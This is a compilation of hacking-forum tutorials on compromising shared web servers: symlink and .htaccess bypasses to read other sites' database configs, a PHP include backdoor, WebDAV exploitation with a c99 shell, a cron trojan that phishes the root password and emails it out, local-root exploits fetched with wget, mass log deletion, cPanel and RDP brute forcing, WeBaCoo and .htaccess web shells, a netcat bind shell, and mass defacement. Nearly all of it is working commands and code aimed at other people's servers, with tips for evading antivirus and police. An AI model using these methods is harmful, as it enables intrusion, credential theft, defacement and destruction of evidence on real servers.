"&file=config.shtml& desc=(Bad request)
BYPASS SYMLINK FROM PORT 2077
So once you Symlinked the Config You can just login to port 2077
Then public_html/path/config.shtml
You will be able download the config.shtml and you can view the source .
Method 3 : Symlink Bypass via Open Port using Python
For this First we Python to be Installed on Server.
To check if Python is installed run this command python -h
If its install we can use the following python script and Bypass

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os
port = 13123
if __name__=='__main__':
os.chdir('/')
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", port), Handler)
print("Now open this server on webbrowser at port : " + str(port))
print("example: http://site.com :" + str(port))
httpd.serve_forever()
I have added the script to downloads .
Now Upload the script to the shell

http://foto.pk/images/205cjg3.jpg

now run this command : python port.py

http://foto.pk/images/2je1wqq.jpg

Now Open the site with port 13123
www.site.com:13123

http://foto.pk/images/j5ifwm.jpg
Server Bypassed From Open Port .
Method 4 : Bypassing Symlink Using .ini Method
Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension .
ln -s /home/user/public_html/wp-config.php config.ini
now go to the shell and make a new file a.shtml
Paste the following code inside it and save it

and save it .
Now open the a.shtml in the browser and right click and view the source . Done Bypassed
Method 5 : Bypassing Symlink Using ReadMe file
Make a new directory in your shell From the Cgi shell normally symlink the config
ln -s /home/user/public_html/config.php config.txt
now make .htaccess with the following code .
.htaccess
Options All
ReadMeName config.txt
Now when you open the directory on the browser you will be displayed with the config source
directly .
eg : site.com/sen/config.txt is your symlinked config then when you open
www.site.com/sen/ you symlinked config will be displayed as a ReadMe content .
Thats it i have explain All the Methods to Bypass Symlink If you will have problem Bypassing
Try all the Following .htaccess
1 - > .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm

AddType txt .php
AddHandler txt .php
2 -> .htaccess
Options All
DirectoryIndex ssss.html
addType txt .php
AddHandler txt .php
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
3 -> .htaccess
suPHP_ConfigPath /home/user/public_html/php.ini
4 -> .htaccess
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
5 -> .htaccess
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php

<IfModule mod_autoindex.c>
IndexOptions
FancyIndexing
IconsAreLinks
SuppressHTMLPreamble
</ ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

.HTACCESS TO BYPASS DISABLED FUNCTIONS
This one is to make python work :
.htaccess
AddType
application/x-httpd-cgi .py
AddHandler cgi-script .py
AddHandler cgi-script .py

This one is to make perl work :

.htaccess
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
AddHandler cgi-script .pl

This one is to enable Symlink if the function is disabled in the server :

.htaccess
<Directory "/home"> *** Options -ExecCGI* ***
AllowOverride
AuthConfig Indexes
Limit FileInfo
Options=IncludesNOEXEC,Indexes,Includes,MultiViews
,SymLinksIfOwnerMatch,FollowSymLinks
</ Directory>

This one is to retrieve users permissions :

.htaccess
AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html

Bypass Internal Server error :
.htaccess
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Change php version:
.htaccess
AddType application/x-httpd-php4 .php

Bypass Uploads Options and upload shell in another extension :

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>

Retrieve Config with picture method :
.htaccess
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :

www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Diff
erent_.htaccess_and_Methods_by_Sen_Haxor.rar

So thats it i think i had covered everything thats related to Bypass Symlink and Disabled
Functions on Server . If you still face Problem in Symlink Contact me :

www.facebook.com/cheenu.vis

Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro -
Godzilla - Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya
Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking
Decoder - Rafay Bolach -Mike Wals - Team Indishell and all Indian Hackers

Hack WebDAV & Deface

Alright guy's today in this tutorial I'll be explaining how to use the webdav
exploit. The link for the tools used for this tutorial can be found in the
bottom of this tutorial. For those of you who do not know what a Webdav is
here is the definition.

Web-based Distributed Authoring and Versioning, or WebDAV, is a set of
extensions to the Hypertext Transfer Protocol (HTTP) that allows computer-
users to edit and manage files collaboratively on remote World Wide Web
servers.

But fo our purpose we will be using it to exploit RDP's or the Remote
Desktop Protocol. For a better understanding of these with RDP's they could
range from Vp's to Dedi's to just plain old home Pc's, but no matter what it
is you will gain full access to the machine and can basically do whatever you
want using a shell. For those of you who are new to the hacking scene a
shell is a php script that allows you to view all of the files on the server you
decide to host the shell on. The most common shells are the c99 or the r57,
but in this case we will be using the c99. Now please be aware these are not
the only shells available there are several posted throughout the forum and
you can find them by simply using the search button located on the navbar.
Now before being able to use the shell we have to find some vulnerable Ip's
to gain access to for this we will be using the WebdavlinkCrawler which can
be found in the webdav tools kit I have provided below here if you don't
trust my download links simply don't download them it's that simple. Once
you have managed to open the program you will be presented with this
interface.

as you can see there is a Start, Stop, and Remove double. All of these terms
will be explained later on, but what you are going to want to do is click the
start button and it will being to search for the Ip's with webdav in them.
Once you have managed to gather some ip's like you see in the picture here

Now please be aware this was only with about 15 seconds of searching and
your results may differ depending on your connection speed as well as the
amount of time you run the application. After you have all of your Ip's your
going to want to click one so it's highlighted and the right click it you will be
presented with a popup that looks like this

I have no idea what that actually means,(if someone would like to translate
and tell me please feel free.) but what it is doing is copying all of the Ip's
you have scanned. After you have scanned all of the Ip's your going to want
to paste them in a new word document

once you have done so save it as something you can remember and put it in
a convenient location. After you have saved your collected webdav Ip's in a
word document your going to want to open the Ip Scanner in the folder. It
will look like this

what your going to want to do is click the "Get Ip's" button and browse to
your recently saved text file. After you have your ip's in place

your going to want to press the scan button what this is doing is now taking
all of your Webdav Ip's and figuring out which one's are vulnerable to this
particular exploit. The one's on the right are the ones it scanned and if you
happen to get any in the middle those are the one's you can exploit. In my
case this time I didn't happen to have any that were open to this exploit
because I had a limited amount of Ip's. After you have managed to gather
some ip's in the middle column and are ready to exploit the server you can
just double check by going to the ip/webdav/ in your browser and Ip being
one of the exploited ones you managed to get and your going to be looking
for an index page that says Webdav Test page. After you have confirmed it
is ready to go your going to want to open "map network drive" this can be
found by either right clicking Network or my computer in the start menu.

what your going to want to click on is the hyperlink that reads " Connect to a
website that you can use to store your document's and pictures. You will be
presented with a screen all you have to do is click next. And the your going
to want to click Choose a custom network location.

Now this is the important screen it should look like this

What you have to do is put the Ip/webdav in the text box and click next

you should then be prompted with a login box the default username is
wampp and the default password is xampp. Once you have successfully
connected you can now browse it's folder's so what you have to do now is
just drag and drop the shell.php in side the main directory

After doing so go to ip/webdav/shell.php it should look like the following

Feel free to use that Ip if you are that much of a noob and cannot do
anything for yourself. Once you are viewing your shell inside the execute
textbox your going to want to do the following commands

net localgroup administrators SUPPORT /Add

What this is doing is making the remote desktop username SUPPORT and
the password !password!. So now the last and final step is to open remote
desktop and connect using the Ip and the login detail's we have just created.
The shell is for you to explore and discover for yourself. Now you may be
wondering What can you do once your in?

Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the
server:D
2. I upload my RAT’s incase they try to take back there dedi.
3. Host a web IRC bot or Shell Booter
4. Store files or host websites or shells
5. Make a Botnet!

TOOLS:
http://dl.dropbox.com/u/18083172/Webdav%20tools.rar

Root server without local root exploit
Many hackers find it difficult to find a local root exploit for rooting the server. So here is few
methods you could try to gain root acess without using a local root exploit!
1. Custom Cron Tab Scripts
Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has
created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error
Message and the Root user will probably type in his password.
First, check out if there are any Cron Job Tasks:
crontab -l
If you see any Custom Script, we must Check out if we can Write on it.
Let’s say we got a Custom script here: /bin/cronscript
To check if we can Write a File, type:
stat /bin/cronscript

(If you get something like: “-rwxrwxrwx” in the output, you can edit the File!)
Let’s edit the file and send a Fake Error Message.
Make a Copy of the Original Script to /bin/cronscript.bak :
cp /bin/cronscript /bin/cronscript.bak
Edit the /bin/cronscript like this:
#!/bin/sh

echo “An System Error Occured!”

echo “”

echo “Error Code: #131425″

echo “”

echo “Update to get the Latest Patch for this Security Issue.”

read -s -p “[sudo] password for root ” rootpasswd

echo “”

echo “su: Authentication failure”

echo “”

sudo apt-get update && sudo apt-get upgrade

sudo echo “The Password is: $rootpasswd” > .kod

mail -s “Root’s Password” “ [email protected] ” < .kod

rm .kod

mv cronscript.bak cronscript

You should just Replace the Underlined with your E-Mail and the Name of the Script!
After you save the File, type: chmod +x cronscript to set it as Executable!
This script will:
- Send a Fake Error Message
- Request for the Root’s Password
- Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at
the /bin )
- Restore the Original File
When the Script gets Executed, the Root User will Enter his Password and it will be send to you!
It would be better if you had some knowledge on Bash Programming…
2. Enumerating all SUID Files
An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it.
What does this mean for you: You can Escalate Priviliges in this way, if it is in an Important
Directory.
you can Social-Engineer a Privileged User.
To find all SUID Files, type:
find / -user root -perm -4000 -print
This will show all the SUID Files to your Terminal. Take your time and check them as they
can help you to escalate Priviliges!
3. Brute Forcing
I know what you are thinking after seeing the title, well this is different the tool we gonna use is
called Rootdabitch
What is so special in this?

The magic about this tool is that It works in background, so you can leave it working for days
until you have results... when the password is cracked it will be mailed to you :)
For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You
can get the tool here Rootdabitch v0.1
Usage:
./rootdabitch.sh [email protected]
For kiddies:
First download rootdabitch to the server:
wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
Extract it by the following cmd:
unzip rootdabitch-0.1.zip
Chmod it to 755:
chmod + x rootdabitch.sh
Finally run the script
./rootdabitch.sh [email protected]
Simply just chmod it and run the script. If the password is cracked you will have a mail
containing the root password which will be in the file "passwords.txt" attached to the mail

LINUX SERVER ROOTING
Hello Hax0rtools.com Readers today i will show you how to root a server

Root is the Administrator of all server. If someone got root access he can do
anything with server like delete and copy anything on server ; can deface all the home pages
(massive
deface )

Although there are mainly 3 wayz in which you can get into the server but here we will take the
first method that is by local root

NEEDS :
 Netcat (Download from Here)
 Shelled site (Best Shellz Here)
 Local root exploit (which you can find it Here Or Download This collection
Here)
STEPS:

 In RUN program type cmd then type this cd C:\Program Files\Netcat
but first save your netcat in the directory

After it type this : nc -n -l -v -p 443 , and you will get this -

Now open the url in which you had upload your shell and then connect it using
back connect option in the shell(Be careful some shell do not have this option and
do not use any proxy,tor or VPN), when connection is established you will
get something like this -

Now you have successfully connected .. then we have to get the local root exploit
like now we have 2.6.18-374 2011 .

 Now we have to first upload our exploit in a writable folder, simply we can
just change the directory to the /tmp folder which is a standard writable
folder .
command to change dir to /tmp : cd /tmp
 To upload your your exploit we will use the wget function .
Now Type : wget http://www.example.com/exploit.c

Now exploit will be uploaded to tmp folder

(CASE TYPE 1) if you have uploaded your exploit as (exploit.c) the we have to
compile it, so to compile it we will type the following command .

Type : gcc exploit.c -o exploit

Note that above command exploit refers to the name of your exploit (exploit.c) .so
if its properly compiled with no errors & warning then you can proceed or if you get
an error then find another exploit.

(CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by
typing the below command .

Type: unzip exploit.zip

 After we have done all the above steps correctly, its time to give permission so we will
type the following command
Type: chmod 777 exploit
 Now its time to run the Exploit, to run the exploit we will type the following command
Type: ./exploit

Now the exploit will run & the server will be rooted ;) . To check weather we got root we can
type

Type: id or whoami

NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER

If you do not want to caught yourself by Cops then delete the log using following
commands

rm -rf /tmp/logs
rm -rf $HISTFILE

rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;

i hope you had learn how to root a server My next Tutorial will be about How to mass
deface after rooting a server.

Cpanel Cracking
Things Required :-
 Shelled site ( Download Best Shellz Here)
 Cpanel Password Cracker (Download Password : www.hax0rtools.com)

Step By Step Tutorial :-
 First open you shell & upload the cpanel password cracker shell
 Then go down & click on User .

 Now after you have clicked on User, below you will get all the usernames of the
Cpanel . So now move to next step, your next step will be to get a good
Password list for a Dictionary attack . After getting it you have to copy the
username & paste it in the username block (above) & paste the password list in
the password block .Then finally click on start .

Tip: Password list should be short & effective .

 When the cracking is finished, you will see the result .

 After Getting the login info you can login by going to -> www.site.com:2082 or
www.site.com/cpanel

Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error
Now days most of the Linux Kernel server show this error when you try to
symlink the server . Most of the server which shows 403 forbidden has cant
read named.config error when you try to symlink using scripts like
Symlink_Sa or Madspot Security Team Shell or what ever script used for
Automated Symlink .

This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be
used to bypass this .

I will be posting the download link of some shells i will be using in this
tutorial

Best Script which can bypass cant read /ect/named.conf are :

1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files )
2. Config Killer By Team Indishell . ( Mass Symlink Config file php based
script )
3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files )
4. Symlink_Sa 3.0 Automated Symlink Script .

Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script just
upload them on to the server make sure that you create a new directory .
Upload the scirpt and use the command cat /ect/passwd to read all
/ect/passwd from the server and copy them and just open your script and
paste it there and click on Get Config and Your Done . Just open the link of
the folder you created eg . site.com/sen/allsoft.pl you need to open
site.com/sen/ and all config files will be there

Note : Its better to create a php.ini file before you do this for 100 % Result

All 4 shells i have mentioned i will post the download link

And i will be using a another private shell for this which i wont be giving you

all for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can
bypass cant read /ect/named.conf error easily . But 403 Forbidden Server
cant be bypassed using this shell .

So now if we cant symlink to the Public_html/ of the website we can use
Symlink_sa 3.0 script Symlink Bypass Option -

So now that we can easily Symlink to /Public_html/ path of each website

Now some server show 403 forbidden Error when you try to Symlink them
so now lets see how to by pass this shit

For 403 Forbidden Error i will be Using the Following Shells :

1. Dhanush Shell Coded By Arjun . ( This shell automitically creates

.htaccess , php.ini and ini.php files after you login )
2. Mannu Shell by Team Indishell Private ! .
3. Symlink_sa 3.0 Script

I will be posting the download link of Dhanush shell and Symlink _sa 3.0 (
Mannu shell is private as i already told )

So what is the trick that makes us bypass 403 Forbidden , Its just the
.htaccess and php.ini which contains the following code :

.htaccess

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

php.ini

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

1.) 403 Forbidden Error :

2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and
ini.php .

3.) Mannu shell to Check if we Bypassed 403 Error :

4.) Bypassed 403 Forbidden and Access to Public_html/ Path

Bypassed can't read /ect/named.conf and 403 forbidden Error

Backdoor a WEB SERVERS WITH WEBACOO
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal
connection over HTTP between client and web server. It is an exploitation tool to maintain
access to a web server (hacked).
WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS,
Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands
on the compromised server. File obfuscated performs communication via HTTP header’s Cookie
validating HTTP requests and responses from the web server.
WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined
payloads. It also offers the “terminal” mode in which the user can establish a remote connection
to the server and execute commands with privileges of the web service desired.
In many cases, this tool is used when a server does not have the Netcat.
INSTALLATION:
git clone git :/ / github.com / anestisb / WeBaCoo.git
wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
. / Webacoo.pl-h

COMMANDS:
1) Create obfuscated backdoor ‘backdoor.php’ with default settings:
. / Webacoo.pl-g-o backdoor.php
2) Create ‘raw-backdoor.php’ backdoor de-obfuscated using the work “transit”
. / Webacoo.pl-g-o raw-backdoor.php-f 4-r
3) Set “terminal” connection to the remote host using the default settings:
. / Webacoo.pl-t-u http://127.0.0.1/backdoor.php

4) Set “terminal” connection to the remote host to configure some arguments:
. / Webacoo.pl-t-u-c http://127.0.0.1/backdoor.php “Test-Cookie”-d “TTT”
5) Set “terminal” connection to the remote host via HTTP proxy:
. / Webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php
6) Set “terminal” connection to the remote host via HTTP proxy with basic authentication:
. / Webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8:3128
7) Set “terminal” connection to the remote host via Tor and record activity:
. / Webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt
Now, having installed the tool and knowing the commands, we will create the backdoor to get
connection to the web server from the console.
For this case I obtained any server (hacked) where I’ll upload the backdoor that creare with the
following command:
. / Webacoo.pl-g-o backdoor.php

The backdoor.php is created and placed in the folder of files (WeBaCoo), then go up the file to
the server (hacked) and proceed to connect to the server with the following command:
. / Webacoo.pl-t-u http://www.sitio-web.com/backdoor.php

The connection to the server is perfect, so you get very fast connection.
Simple commands:

In this case will place “load” to see the commands that will handle the entire server, which are:
1) MySQL-CLI: MySQL Command Line Module:
mysql-cli (ex. ‘mysql-cli 10.0.1.11 admin pass’)
2) PSQL-CLI: Postgres Command Line Module:

psql-cli (ex. ‘testdb psql-cli 10.0.1.12 root pass’)
3) Upload: File Upload Module:
upload (ex. ‘upload exploit.c / tmp /’)
4) Download: File Download Module:
download (ex. ‘download config.php’)
5) Stealth: Stealth Enhance Module
stealth (ex. ‘stealth / var / www / html’)

These commands are easy to use, do a brief demonstration with MySQL-CLI command for db
and connect to the server.
1) Download the configuration file:
download configuration.php

2) Open the configuration.php file copy of the MySQL user and password, you type the
command:
mysql-cli 127.0.0.1:3306 db_user db_password

3) The tool will connect to MySQL, we can only type show databases; to appreciate all the DB.
Similarly use other commands to upload a local root exploit or download any server.
Now with this tool you no longer need to have the web server or make a BackConnection Netcat
often fails, to connect to a web server.

Web Server Hacking through Command Injection

Web Server Hacking through Command Inj ection

Hello, Folks! do you know ? Command Injection is the most dangerous Web
Vulnerability, its little harder to find. Command Injection is also called Command
Execution, Code Injection, or Remote code execution. well it's my first post on
command injection so - I'll start from basic and simple tutorial may be i'll post
some advance techniques in future, depend upon my learning #Command
execution is my favorite vulnerability :)

What is Command Injection :
Command Injection is one of the most dangerous web vulnerability which occurs
due to unauthorized commands send by an attacker to Web Server and server
accept it without proper client input validation which is connected to system server
application and doesn't have any type of Filter or any whitelist of blocking unwanted
commands, that allows an attacker to inject any command on Website Server
Operating System.

One simple example of Command Injection : Assume that your current Computer is
Web Server and as you all know every web hosters needs an Operating system that
is called server - like : Linux, Windows, Unix etc. Every website has it's own Server
and Operating system which is connected to World Wide Web. Cool, now every OS
have Terminal like Command Prompt in windows. Now assume that you creat e a
web application that allows any user to ping IP then definitely you've to connect
your terminal or command prompt with Web Application (Reason only OS Terminal

connected to WWW can ping any requested IP) without any user input filteration
and validation your application blindly trusts on users client request and execute it
on Web Server OS Terminal. So what if an attacker determine your application is
vulnerable to command injection and send unauthorized commands to Server
Terminal.. you know he can gain complete access to your Web Server. It's like you
handed your OS terminal in an attackers hand, so of-course if you have control on
OS Terminal then you can do anything on Web Server like, Shell Upload, Web Site
Deface, Database takeover, creating multiple vulnerabilities, etc.

Understanding Complete Command Injection :
Fine, guys if you still didn't understand what exactly is command injection and how
it works then here i got simple tutorial for you. Just follow the below's steps and
learn Command execution in a day.

Requirements :

DVWA Pen-testing lab or OWASP BWA - (DVWA)
Basic knowledge of Windows CMD and Linux Terminal
Little Networking Knowledge
Burp Suite (Not Recommended)
Brain!
Simple Command Execution tutorial for Beginners :
I'm gonna show you simple command execution tutorial through OWASP BWA
(DVWA) Pentest lab that runs on Virtual Machine, we'll execute our command on
server and will able to Take down complete Website.

As you know DVWA is already vulnerable to Command execution (for Pentesting) so
we don't need to find it, directly determine the OS and execute commands.

Now, in below image you can see that Burp Suite found server information :

Click on Image to enlarge it

Or, you can also Nmap for more information :

Click on Image to enlarge it

If you have little knowledge of Networking you can easily understand what it is and
how stuffs work, If you want to learn Networking click here.

To become an expert in Command execution you've to learn Linux, Python, Perl, C
and DOS Programming languages not completely but you must know abou t 40% to
50%. So guys back to Injection attack.

Open DVWA - (Command Injection) Vulnerability, as i told you DVWA Web App
allows anyone to Ping an IP that is connected with Command Prompt, (Check
source code) to know how web app works.

Click on Image to enlarge it

Try to understand how exactly works and what we've to do to Hack Web Server. As
you know complete server can be compromised via Command Prompt and
Terminal. Normally we use this command to ping an IP using Command Prompt in
Windows : "ping WEBSITE YOU WANT TO PING"

Click on Image to enlarge it

The same DVWA Web application do, that means we're totally on Command Prompt
and as you saw source code it doesn't have any type filter to filter users input and
save server from Command Injection attacks.

Now give a try to DVWA with one IP request to see how it works.

I Pinged 127.0.0.1 IP to see how it works and it simply.. now we can use some evil
mind to compromise web server with command injection. Check Vulnerability with
"& ls" command. In generally method we use "ls" to get list of files and folders
around the directory.

Click on Image to enlarge it

Now any Noob can understand that we got complete access to web server
command prompt, so easily an attacker can totally compromise server. lets try with
this command "& cd ../../../../../../../../WINDOWS/system32 & dir" You'll get a big
Huge page with complete directory names, files and folders you can also search for
cmd.exe

Click on Image to enlarge it

Now how to hack complete web server and get database, and all files even we can
gain root access. So just we need to upload our backdoor, Click here to learn how
to upload C99 Shell PHP backdoor and Hack website using Command Execution.

Thank you for reading our post, Stay tuned with us and please share it to increase
us, and always feel free to comment and let me know your problem.

How To Hack Windows Servers Using Dubrute 2.2
Hello,

Today im sharing u How to Hack Many many Windows VPS.

All u need 2 Softwares called DuBrute and Vnc_scanner to hack VPS.
Download Links :
Vnc_scanner : Here
Dubrute : Here
How to Use ?

1) Download both the files from the above link.
2) Extract both the files anywhere in ur pc.
3) Open Vnc_scanner folder
4) Open the exe file called vnc_scanner_gui.exe

5) Select any Country.
6) Click on Get Dial List
After the all ip list Came then :

7) Click on Start Scan

After that it will scan for VPS working ips.

After Scan finished click on Start parser.It will save good ips in new text file called IPs.txt.

Now u need to get the usernames and Passwords for Scanned ips.For that u have to use one of
the hacking software called Dubrute.

1) Open Dubrute folder
2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder
3) Open the DUBrute.exe

4) Click on Generation
5) Check the image below.

1st click on File ip then select the text file called IPs.txt and Open
2nd Select File Login then Open and then File Pass and Open.
3rd ,Click on Make and Press Ok.
Then Click on Exit

Now press Start in ur Dubrute.

Let it brute the combinations.When a working VPS which match IP , Username and Pass , it
would be saved in Dubrute folder File called goog.txt

Like dis :
In this Image shows that I found 3 VPS which is working.

Note : Both the files has Virus.Ur anti-virus detect as Trojan etc.So when u download ,if ur anti-
virus active then it will delete ur files.If u want to use then u have to turn off ur anti virus.Or u
can hack vps with a VPS like me.I downloaded THese files on a VPS and hacked it ;P.These soft
i used to hack VPS from last 1-2 weeks.I hacked around 100 working VPS.

This is a Detailed Tutorial about How to hack VPS ?.Should u have more doubt on this , feel free
to reply here.am here to help u.

Thanks and Good Luck to all for hack many many VPS.

How to use VPS

Go to Start > Run > Type mstsc and press OK
Then put ur VPS ip and Connect.Then Type ur ID and pass then OK
Thats it.U are into the Virtual Private Server

How to Change Pass of VPS?
Press Ctrl + Alt + End u will see the option for Change pass.
Note : U could change pass if only u have the permission from the Administrator.
Respect !

Symlink Tutorial for beginners
What do you mean by Symbolic links?

In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a
reference to another file or directory in the form of an absolute or relative path and that affects
pathname resolution.

How to Do Symlink on Web-server ?

In Symlink you need to shell access like GNY,C99,r57 etc.. on website.. It's look like this

Now You need To create 1 directory with any Name like sym,test etc....

Now after Creating Directory You need 2 file
1. Blank .txt file in zip format.
2. .htaccess

The txt file include this "/" and save it..
and .htaccess file include this below code:

Options Indexes FollowSymLinks
DirectoryIndex test.htm
AddType txt .phpAddHandler txt .php

and save it like ".htaccess"

now you need to upload both file zip and .htaccess. After Uploading both file We need to "unzip"
file using this command:

"unzip "file name" "

after unzip u show a txt file there. Now you need to open appropriate path in Web browser.

It's look like this.

Now Just Click on 1.txt file that
you unzip a zip file. After Click on 1.txt file It include all Directory's of the Web-server check
out below Image:

Ok done Now in Symlink we will check the Directory path like

1. /home/"Website Username"/Public_html/
2. /hsphere/local/home/c283273/

There are Different Path Just you need to check out it.

If you Click On "Home" You will get 403 Error Means Forbidden Error but never mid after you
get this Error you need to add "Website Username"

To find WebUsers You need to execute This command

cat /etc/passwd

the path is "/Home/"website username"/public_html/"

After execute cat command it's look like above image.

Now Just find specific Target that have ADMIN LOGIN PAGE and CONFIG FILE

How did you find this specific Target site?

you need Server Ip and www.bing.com

To find Joomla,Wordpress and php site we can use this dork for it.
1. ip: 123.x.x.x index.php?option=2. ip: 123.x.x.x "Powered By WordPress"
3. ip: 123.x.x.x .php?id=
and more......

Finding Target site now you need to find config file. in joomla the config file name is
"configuration.php" in wordpress "wp-config.php" etc.

You cannot directly see the file using like this

www.Target.com/wp-config.php
www.Target.com/configuration.php

But when we do symlink on specific Target we can show config file using Right click and view
source..

It's look like above Image

This config file include site Database information like Database Name, Username, Password etc..
after getting this You can login into site data base and you can edit,delete of specific columns,
fields etc..
But we need to change admin password. In many case The password is in MD5, base64 etc..
encrypted form. You need to Decrypt it... that's it.

after changing the password You know what to do...!!!

MASS DEFACE TUTORIAL
today i will tell you how to mass deface in few steps .. so lets start .

Things Required:
 Rooted server (check how to root a linux server tutorial : Here)
 Mass deface script ( Download from Here password :www.hax0rtools.com )
Step By Step Guide :
 First we have to download our mass deface file, so as usual we will use the wget function
Type: wget www.somesite.in/massdeface.zip
 As we have downloaded it in a zip file, now we will unzip it by typing
Type: unzip massdeface.zip

 One you have unziped it , we will now run the script by typing
Type: perl massdeface.pl
 Now after we have run the script it will show its usage [ perl mass.pl /tmp/index.html ],
so according to that we have to run it, but before we do so we have to download our
deface page using wget .
Type: wget http://www.somesite.com/index.html

So once we have downloaded our deface page, now we will run the final command to mass
deface .
Type: perl massdeface.pl /tmp/index.html

ATTACKING WEBSERVERS VIA .HTACCESS

A while back I was testing a CMS that had a curious feature, all uploaded files were
placed in their own directory. This was not a security enhancement as the
application allowed php files to be uploaded. However I coudn't help ask, what if
php uploads had been restricted? The answer was .htaccess files. Using SetHandler
in a .htaccess file is well known, but does not lead to remote code execution. So
after some thinking I put together some self contained .htaccess web shells. I wrote
both a php and a server side include shells, but other options can easily be added
(jsp, mod_perl, etc).

This works by first diverting the default apache .htaccess access restriction from
within the .htaccess file so we can access it as a url. Next we reconfigure the
.htaccess extension to be treated as a dynamic content script and finally we have
our payload. The attack works because the .htaccess parsing and processing for
apache configuration directives occur before the .htaccess file is processed as a web
request. There is a relatively small gotcha, the payload has to be commented out
with a # at the start so it doesn't get interpreted by apache and likewise, the script
interpreter must ignore the apache directives. PHP lends itself well to this as any
content not within the <?php ?> tags are presented as is.

01 # Self contained .htaccess web shell - Part of the htshell project

02 # Written by Wireghoul - http://www.justanotherhacker.com

03

04 # Override default deny rule to make .htaccess file accessible over web

05 <Files ~ "^\.ht">

06 Order allow,deny

07 Allow from all

08 </Files>

09

10 # Make .htaccess file be interpreted as php file. This occur after apache has
interpreted

11 # the apache directoves from the .htaccess file

12 AddType application/x-httpd-php .htaccess

13

14 ###### SHELL ###### <?php echo " \n";passthru($_GET['c']." 2>&1");
?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file
via the url http://domain/path/.htaccess?c=command for remote code execution.
The collection of attack files are collectively accessible from my github htshells
repository.

How to Backconnect with netcat

1.you need download this

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.upload nc with shell
3.set chmod 777 for nc

Quote:
chmod 777 nc

4.run command ./nc -vv -l -p [port] -e /bin/bash at shell

Quote:
./nc -vv -l -p 4499 -e /bin/bash

5.open cmd direct to where nc save like this cd c:\
and run this command nc -vv [ip target] [port]

Quote:
C:\>nc -vv ip server 4499

6.now you have back connect it

Hacking Cold Fusion Servers - Part I
Today I will go over part I of a few tricks we can use to attack Cold Fusion
Servers of various versions using a few published methods. Cold Fusion is an
Adobe product targeted at Enterprise and Small Business owners. Probably
most commonly known for and associated with CFML or Cold Fusion Markup
Language, most visually associated with .cfm files on web servers. CF
platforms are built on a Java core and as such it also has some built in
features which also allow command execution and database interaction. The
following should present you with a few methods you can use to check for
common vulnerabilities on these platforms, as well as how to exploit them.
Most of these were published ages ago in 2010 but there are still many sites
which are either running versions which are un-patchable or just simply
running unpatched software still....

I will start this series off with the most common vulnerability first, which is
the known Local File Disclosure, or LFI, in the 'locale' parameter (also
